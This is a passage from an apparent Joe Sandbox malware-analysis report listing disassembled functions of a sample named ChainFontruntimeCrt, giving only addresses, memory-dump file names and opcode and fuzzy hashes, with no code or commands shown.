                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d29d619312ced35993890bd41e1a32d787ebd49d1aa600c6493f0814072b845f
                                                                                                                        • Instruction ID: 6cf333c3fe567a6341ee760a3f460c9421fe9e2d43f55b31c4196743c043d70d
                                                                                                                        • Opcode Fuzzy Hash: d29d619312ced35993890bd41e1a32d787ebd49d1aa600c6493f0814072b845f
                                                                                                                        • Instruction Fuzzy Hash: 1D412A12F1CA590EE718F7BC60AAAF9B7D1EF88325B1545BFD00EC71E7DD18A8418285
                                                                                                                        Function 00007FFD9B7D08E8 Relevance: .1, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ebfa9cb9a5ba1e55c011639e68c722bf57548b8414160c01c3fc5786d6ca6cba
                                                                                                                        • Instruction ID: 48e6bed129293908f8bbb51515e03ada53e5096b797dfe4ba36db7d65a30e11e
                                                                                                                        • Opcode Fuzzy Hash: ebfa9cb9a5ba1e55c011639e68c722bf57548b8414160c01c3fc5786d6ca6cba
                                                                                                                        • Instruction Fuzzy Hash: E331253170D9184FDB68EA5CE88A9B977D1EF8932070642BBE48EC7176DD11AC828781
                                                                                                                        Function 00007FFD9BBE58A7 Relevance: .1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e4cf85bcac314cbb770e806d3c4857d5538cfd624f2365c2829ee9847717470f
                                                                                                                        • Instruction ID: b4acec7cbb6305aeffdf9758759df620e0a216071cfa8bf20b9fd6c3f181195f
                                                                                                                        • Opcode Fuzzy Hash: e4cf85bcac314cbb770e806d3c4857d5538cfd624f2365c2829ee9847717470f
                                                                                                                        • Instruction Fuzzy Hash: 5C41883160C9488FDF9CEF58C465DA5B3E1FBA8320B0545AAD04EC32A6DE35F845CB82
                                                                                                                        Function 00007FFD9BBEA8D7 Relevance: .1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff70c67e216867e025966f1a79ee4e9703dfabc567b38ebcb7bff6a4b62ba30c
                                                                                                                        • Instruction ID: 0f24055094c5bf37ab0d2af5a3f74549f73c7697745ad0f59a64201ed4f7442c
                                                                                                                        • Opcode Fuzzy Hash: ff70c67e216867e025966f1a79ee4e9703dfabc567b38ebcb7bff6a4b62ba30c
                                                                                                                        • Instruction Fuzzy Hash: BB41873260C94D8FDF98EF58C4A5DA5B3E1FBA9310715016AD04EC72A2DE35F945CB81
                                                                                                                        Function 00007FFD9BBE12B9 Relevance: .1, Instructions: 123COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b70123f6f32dfc12da0cde7523a51fc389a3f871274b5a8f3c48caddb2e11142
                                                                                                                        • Instruction ID: e542f37ab75aaee2e840e0c9a4dd5052d14f83d9017b27d58a121b40d5cf2c98
                                                                                                                        • Opcode Fuzzy Hash: b70123f6f32dfc12da0cde7523a51fc389a3f871274b5a8f3c48caddb2e11142
                                                                                                                        • Instruction Fuzzy Hash: 89310461B0E18E8BF339669458315B93A90BF41724F3A01BAE54E871F2DD0C6A4152C3
                                                                                                                        Function 00007FFD9BBEA981 Relevance: .1, Instructions: 120COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6db277250f1de17be1466305442fe26d8b553e4ab6837e31db7e001dc5ac196f
                                                                                                                        • Instruction ID: 71b821450e97a85f2c4ae67d685bf422627188e06f55aee06d1d744d0366387c
                                                                                                                        • Opcode Fuzzy Hash: 6db277250f1de17be1466305442fe26d8b553e4ab6837e31db7e001dc5ac196f
                                                                                                                        • Instruction Fuzzy Hash: 0B31803160C9498FDF99EF18C0A5E65B3E1FBA931071505A9D04EC72A2DE34F841CB82
                                                                                                                        Function 00007FFD9BBE5951 Relevance: .1, Instructions: 120COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9252f10d10621f832864d45cd4b9b2558a4a3ef2ba10fa1aa4212c6d7638df78
                                                                                                                        • Instruction ID: 9d5aabb3b9a4d00300cf4cef28e558e410e3992d57981542d95ba89700adfac2
                                                                                                                        • Opcode Fuzzy Hash: 9252f10d10621f832864d45cd4b9b2558a4a3ef2ba10fa1aa4212c6d7638df78
                                                                                                                        • Instruction Fuzzy Hash: 5531723161C9488FDF5CEF18C465EA5B3E1FBA8310B0545AAD05EC72A6DE35F845CB82
                                                                                                                        Function 00007FFD9BBE58EB Relevance: .1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cf66050ad129be643900d8668f86df83f0149dd2ac074989a3e63f936b46bae4
                                                                                                                        • Instruction ID: b98ae93834cc1709d4e0fe8d0458f8435233bfbb5e04643104b4be754d90e4e1
                                                                                                                        • Opcode Fuzzy Hash: cf66050ad129be643900d8668f86df83f0149dd2ac074989a3e63f936b46bae4
                                                                                                                        • Instruction Fuzzy Hash: 8731543161C9498FDF58EF18C465DA5B3E1FBA8310B0545A9D04EC72A6DE35F885CB82
                                                                                                                        Function 00007FFD9BBEA91B Relevance: .1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 13603991d5bfce6129eda484f91ea6c4a8b0a3e53b27f9af25ba14a8d0e4c074
                                                                                                                        • Instruction ID: 61359524132b2f3cb31497fe4d0b2d433e20a21308a6074309e27b6b77e4ca5c
                                                                                                                        • Opcode Fuzzy Hash: 13603991d5bfce6129eda484f91ea6c4a8b0a3e53b27f9af25ba14a8d0e4c074
                                                                                                                        • Instruction Fuzzy Hash: 7331733160C9498FDF98EF18C0A5EA5B3E1FBA931071505ADD04EC72A2DE35F985CB82
                                                                                                                        Function 00007FFD9BBEA6E5 Relevance: .1, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0cbefaed816f70f64ccc57429d81c05e8276ad6584bedf4ebb85fa772ed5050b
                                                                                                                        • Instruction ID: 8bee5c382e7b54df771b3084901e44a5316a30af5a621c5e79b40475960e7881
                                                                                                                        • Opcode Fuzzy Hash: 0cbefaed816f70f64ccc57429d81c05e8276ad6584bedf4ebb85fa772ed5050b
                                                                                                                        • Instruction Fuzzy Hash: A8311E30A0E54ECFDBA8DB9484A16BE77B5FF45304F52017AD41FE21F1DA396A409782
                                                                                                                        Function 00007FFD9B7D1171 Relevance: .1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 81e4c08662308f98d53e6ff12632ce144bbc781b71c1711829c5d8ba4dd8e2a4
                                                                                                                        • Instruction ID: 4171cd43f0488be83faa3401b4ac8b8d4a3bcd0f3a51407e447cfcd329947a10
                                                                                                                        • Opcode Fuzzy Hash: 81e4c08662308f98d53e6ff12632ce144bbc781b71c1711829c5d8ba4dd8e2a4
                                                                                                                        • Instruction Fuzzy Hash: 6C319530A0965E8FDB45EB78C8649B97BF1FF5A300B0606FAD049D71B2DB38A945CB50
                                                                                                                        Function 00007FFD9BBE56B5 Relevance: .1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 57166e3fa2355816418839c36a5a0d5e295bf6ee20a5fee0a187a398be159c13
                                                                                                                        • Instruction ID: 384f0d3ffb84db42af931628334cf723250af44ebb4b5592bc274d00251bab54
                                                                                                                        • Opcode Fuzzy Hash: 57166e3fa2355816418839c36a5a0d5e295bf6ee20a5fee0a187a398be159c13
                                                                                                                        • Instruction Fuzzy Hash: AC311C30A1954ECFEB78DB9484656BE77B1FF44308F5200B6D00EE21F1DA386A509B82
                                                                                                                        Function 00007FFD9BBE1125 Relevance: .1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8e865e52e4b6363cb34665c2d4fa7ddc49fe31f44bd74109320efa77c1e1ac5d
                                                                                                                        • Instruction ID: 3dd6638c2df5db6e91f9315dbc229fdcbfe8fdafc27d5c1c19dd94a87f751317
                                                                                                                        • Opcode Fuzzy Hash: 8e865e52e4b6363cb34665c2d4fa7ddc49fe31f44bd74109320efa77c1e1ac5d
                                                                                                                        • Instruction Fuzzy Hash: FC21B131A0E6CD9FDB569BA488309A87FB1FF56300B1A01EBD049CB1F3DA295909C742
                                                                                                                        Function 00007FFD9BBE5E79 Relevance: .1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 75fe22dc34c4b17d7fd10f8ae470851e795fed85a2876bb6cec43570fe017fa0
                                                                                                                        • Instruction ID: 4276555a490dae364267409cb6f11513df1c615f1371e1428b0e02085e051e87
                                                                                                                        • Opcode Fuzzy Hash: 75fe22dc34c4b17d7fd10f8ae470851e795fed85a2876bb6cec43570fe017fa0
                                                                                                                        • Instruction Fuzzy Hash: FC318171E1E68D8FDB55DBA4C8605EDBBB1FF59300F0500BAD00AE72E2DE286945C752
                                                                                                                        Function 00007FFD9BBE7B15 Relevance: .1, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fae47677a8be990c09a22bc78820b039cd4a73f1cfc73b461acc3c5970fc5bba
                                                                                                                        • Instruction ID: bcfa051b48fd2a0590b847e7e81c6d391215a1218accba377efe23ead892a392
                                                                                                                        • Opcode Fuzzy Hash: fae47677a8be990c09a22bc78820b039cd4a73f1cfc73b461acc3c5970fc5bba
                                                                                                                        • Instruction Fuzzy Hash: D821FC72B0954E4BEB68EBB894366ECB3D1FF54314F150279D05DC32E2EE18690143C1
                                                                                                                        Function 00007FFD9B7D0998 Relevance: .1, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 822f7d4e6fb872e9ee633864c31bac9aa0bd902fafb2f52a85d8c9d0433f204b
                                                                                                                        • Instruction ID: e0a06f7ed7bb7bb9ff31260c9993333d301b97468ba0a88da64bbf7e58460b98
                                                                                                                        • Opcode Fuzzy Hash: 822f7d4e6fb872e9ee633864c31bac9aa0bd902fafb2f52a85d8c9d0433f204b
                                                                                                                        • Instruction Fuzzy Hash: 77210A20B19E1D0FE758E76C94AA676B6C6EBDC351F4102BDE40DC32F6DD28AC418281
                                                                                                                        Function 00007FFD9BBE7A5B Relevance: .1, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a9f2233ca1473cabede032cf34c88b07f9c9982b8876a65f4794f94cd012bc00
                                                                                                                        • Instruction ID: 60d5418d413155e972c22cab54c5962250a91a38e3bb1e805bc0e8f0492214ef
                                                                                                                        • Opcode Fuzzy Hash: a9f2233ca1473cabede032cf34c88b07f9c9982b8876a65f4794f94cd012bc00
                                                                                                                        • Instruction Fuzzy Hash: F0316D71B1990A8BDB58DF98D5A19A8F3A2FF58310B154179D41EC72A2CF34BD12CBC1
                                                                                                                        Function 00007FFD9BBEC9D5 Relevance: .1, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 70dad5e1fa46c1b798a8c6912683f869839bef20d8176bcb903711247ad10f47
                                                                                                                        • Instruction ID: 2fe477641245a6f5f1b9350f88cb2ed5da75765bb562f0ecd8ce727e7ffe343b
                                                                                                                        • Opcode Fuzzy Hash: 70dad5e1fa46c1b798a8c6912683f869839bef20d8176bcb903711247ad10f47
                                                                                                                        • Instruction Fuzzy Hash: 43210B71B0DA4E4FDB68EBA894722E8B7D1FF54314F450179D05DC32E6DE28690187C1
                                                                                                                        Function 00007FFD9BBE45A0 Relevance: .1, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 65299caf03c371e88828105dc575946833d2cbee1eb96782c5c9e352fafec57a
                                                                                                                        • Instruction ID: 9f190e47e1325ccf9cb35cc77e7f67ec16eee84df100dc4621a2ee70b82dac64
                                                                                                                        • Opcode Fuzzy Hash: 65299caf03c371e88828105dc575946833d2cbee1eb96782c5c9e352fafec57a
                                                                                                                        • Instruction Fuzzy Hash: E131F810A1E5DA4EE739825444705797B91FF9630471A46FEC09E8B4F7C92CA98297C3
                                                                                                                        Function 00007FFD9BBE95D1 Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c2c945eb0c2630238fa81bc7ef8daaf5b55042e88983f9c555a55d3645e17a56
                                                                                                                        • Instruction ID: 5d5c281190c5d1fdf96ede6704da76b7e3c6131e88424aa76ff27c1ab0cb92e0
                                                                                                                        • Opcode Fuzzy Hash: c2c945eb0c2630238fa81bc7ef8daaf5b55042e88983f9c555a55d3645e17a56
                                                                                                                        • Instruction Fuzzy Hash: EB313A1061D59A8EE73A829848785B87B51FF4630471945BBD0DFCB1F7E63CEA4983C2
                                                                                                                        Function 00007FFD9BBEE490 Relevance: .1, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0be2b9b38af9c879604f41159acc89a1b4d217c1efd241dbbacf9e1fa06de2a8
                                                                                                                        • Instruction ID: 91859cfccb0303c20f98d6c80ef9659404f3a7a09a07666971be26affda0e9fb
                                                                                                                        • Opcode Fuzzy Hash: 0be2b9b38af9c879604f41159acc89a1b4d217c1efd241dbbacf9e1fa06de2a8
                                                                                                                        • Instruction Fuzzy Hash: EE318E10E1D59A4BE379831484705747B91FF96304F1A46B6C096CB0FFD42CF58187C2
                                                                                                                        Function 00007FFD9BBE2A42 Relevance: .1, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ca885bd41365281ada984f0d653f97436f12d6986dc24ab4edb639d94c4cb0b4
                                                                                                                        • Instruction ID: 1f5c913eee22947cd0fe33a679b2582153efbdf8e0c3f52e0cfe3d215146bc7f
                                                                                                                        • Opcode Fuzzy Hash: ca885bd41365281ada984f0d653f97436f12d6986dc24ab4edb639d94c4cb0b4
                                                                                                                        • Instruction Fuzzy Hash: 88213070B1990A8BDB68DF98D4619ADF3A1FF58314F118179D41EC36D6CF24B912CB81
                                                                                                                        Function 00007FFD9BBE7F8D Relevance: .1, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 938ca86d5eecb59a886ab23e222cd6b8a26304b057d85c5ab5799824f12e9b76
                                                                                                                        • Instruction ID: 6aa3ac789467318b7d4589c6ff092d01141de5af73e65689ed3dea364ffbb2c4
                                                                                                                        • Opcode Fuzzy Hash: 938ca86d5eecb59a886ab23e222cd6b8a26304b057d85c5ab5799824f12e9b76
                                                                                                                        • Instruction Fuzzy Hash: 95214B5261EACA0FD796977848749A1BBA0FF5221470944FBD099CB1E7DD187809C3C2
                                                                                                                        Function 00007FFD9B7D0C25 Relevance: .1, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b369472ac2a556d10d6e9b59f1e3478f369e302666eb55834c196300c9bd0ad5
                                                                                                                        • Instruction ID: f7563416b43be7417a3a2701dcc65a721383a4b204980f34e6f022485a535e38
                                                                                                                        • Opcode Fuzzy Hash: b369472ac2a556d10d6e9b59f1e3478f369e302666eb55834c196300c9bd0ad5
                                                                                                                        • Instruction Fuzzy Hash: 1621F836F0D3594EE712E7A898250EC7B70EFC1265F5583B3D04D8A1E2D9382A4AC791
                                                                                                                        Function 00007FFD9BBE69F2 Relevance: .1, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 61a736bb166905a0360ffa0a543967dd68f72ba7e61b12b0e15331dbea574fe7
                                                                                                                        • Instruction ID: 60709b1e0924977edd18dc907cb85af9dd4705347bf63ac4a5717d9336617cf1
                                                                                                                        • Opcode Fuzzy Hash: 61a736bb166905a0360ffa0a543967dd68f72ba7e61b12b0e15331dbea574fe7
                                                                                                                        • Instruction Fuzzy Hash: 58310930E1990D9FDFA8EB58C465AADB7B1FB68304F0141BDD05EE32A1CE35AA41CB41
                                                                                                                        Function 00007FFD9BBE19C2 Relevance: .1, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 79932515c52ed0b97948cf0c8d9b12b7e6f19a46041bc36bd6d00ddd8b66dabf
                                                                                                                        • Instruction ID: 7e97be667c4c1e9b918ecb1d78ede10ebcc77a0f12964dad9cb405306b9383ff
                                                                                                                        • Opcode Fuzzy Hash: 79932515c52ed0b97948cf0c8d9b12b7e6f19a46041bc36bd6d00ddd8b66dabf
                                                                                                                        • Instruction Fuzzy Hash: F1210A31E1591D8FDF98DB58C465AEDB7B1FF5C304F1101AAD00EE32A1CA35AA81CB41
                                                                                                                        Function 00007FFD9BBEC938 Relevance: .1, Instructions: 82COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f8d6aa724a01fe6cf7f4a1af0b497bee7c54bd512d420aed76f42170c9b1b0f0
                                                                                                                        • Instruction ID: 772a345d69988a2c97b401c9ea9133a56dc3c878653a6aefc270037f62643d4f
                                                                                                                        • Opcode Fuzzy Hash: f8d6aa724a01fe6cf7f4a1af0b497bee7c54bd512d420aed76f42170c9b1b0f0
                                                                                                                        • Instruction Fuzzy Hash: 06216971B1990A9BDB58DB98D4A19A8F3A1FF58300B118139D41ED36A2CF34B912CBC1
                                                                                                                        Function 00007FFD9B7D1E4C Relevance: .1, Instructions: 81COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
